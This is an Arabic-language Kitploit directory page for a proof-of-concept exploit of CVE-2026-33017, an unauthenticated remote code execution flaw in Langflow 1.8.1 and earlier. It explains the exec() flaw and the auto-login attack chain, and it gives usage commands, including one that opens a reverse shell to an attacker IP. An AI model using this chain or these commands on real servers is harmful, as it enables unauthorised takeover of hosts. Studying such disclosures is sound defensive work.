Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-33017-Langflow-RCE-PoC — الثغرة في Langflow 1.8.1 والإصدارات الأقدم تسمح لمهاجم عن بُعد وغير مصادق عليه بتحقيق تنفيذ أوامر عشوائية على المضيف. | Kitploit
أدوات/GitHubGitHub/omer-efe-curkus/cve-2026-33017-langflow-rce-poc
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقأداة الوصول عن بعد
GitHubomer-efe-curkus/cve-2026-33017-langflow-rce-poc

CVE-2026-33017-Langflow-RCE-PoC

الثغرة في Langflow 1.8.1 والإصدارات الأقدم تسمح لمهاجم عن بُعد وغير مصادق عليه بتحقيق تنفيذ أوامر عشوائية على المضيف.

عرض المستودع
1منذ 5 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-33017-Langflow-RCE-PoC

الثغرة الأمنية في Langflow 1.8.1 والإصدارات الأقدم تسمح لمهاجم عن بُعد وغير مُصادَق بتنفيذ أوامر عشوائية على المضيف.

الوصف

تسمح نقطة النهاية POST /api/v1/build_public_tmp/{flow_id}/flow لأي شخص ببناء تدفقات عامة دون مصادقة.

من خلال توفير معامل البيانات الاختياري، يمكن للمهاجم تجاوز التدفق المخزّن بتعريفه المخصص، مع تضمين كود Python عشوائي داخل إعدادات العقد. يتم تنفيذ هذا الكود الذي يتحكم فيه المستخدم عبر exec() دون أي عزل أو تحقق، مما يؤدي إلى تنفيذ كود عن بُعد دون مصادقة.

الإصدارات المتأثرة

root@kitploit:~
Langflow 1.8.1 والإصدارات الأقدم

الميزات

  • إنشاء تدفق عام إذا كان AUTO_LOGIN=true
  • تنفيذ الاستغلال: تنفيذ أوامر عشوائية.
  • شل عكسي: بدء شل عكسي قائم على bash.

المتطلبات الأساسية

  • أن تحتوي نسخة Langflow المستهدفة على تدفق عام واحد على الأقل (شائع في العروض التوضيحية أو روبوتات الدردشة أو سير العمل المشترك)
  • معرف UUID لتدفق عام واحد (يمكن الحصول عليه من الروابط/عناوين URL المشتركة)
  • لا تتطلب أي مصادقة
  • عندما يكون AUTO_LOGIN=true (الإعداد الافتراضي)، يمكن لمهاجم غير مُصادَق تلبية جميع الشروط:

    • GET /api/v1/auto_login ← الحصول على رمز مستخدم متميز
    • POST /api/v1/flows/ ← إنشاء تدفق عام
    • تشغيل الاستغلال عبر build_public_tmp دون أي مصادقة

    الاستخدام

    root@kitploit:~
    python cve-2026-33017.py <host> [options]
    

    الخيارات:

    root@kitploit:~
    -p PORT, --port PORT: منفذ SSH (الافتراضي: 7860)
    
    -id FLOW_ID, --flow_id FLOW_ID: معرف التدفق العام (سيتم إنشاء معرف جديد إذا تم حذفه)
    
    -c COMMAND, --command COMMAND: أمر مخصص للتنفيذ
    
    --shell: تشغيل شل عكسي
    
    --lhost LHOST: عنوان IP للمهاجم للشل العكسي
    
    --lport LPORT: منفذ المهاجم للشل العكسي (الافتراضي: 4444)
    
    -t TIMEOUT, --timeout TIMEOUT: مهلة الاتصال بالثواني (الافتراضي: 5)
    

    أمثلة:

    تنفيذ أمر:

    root@kitploit:~
    python cve-2026-33017.py 127.0.0.1 -c 'touch /tmp/pwned.txt'
    

    بدء شل عكسي:

    root@kitploit:~
    python cve-2026-33017 127.0.0.1 --shell --lhost 192.168.1.100 --lport 4444
    

    المراجع

    GitHub Advisory

    NVD CVE-2026-33017

    Medium

    ⚠️ إخلاء مسؤولية

    هذا الـ PoC مخصص لأغراض تعليمية وبحثية فقط. استخدمه على مسؤوليتك الخاصة. المؤلف غير مسؤول عن أي إساءة استخدام أو ضرر ناتج.

    تنزيل الأداة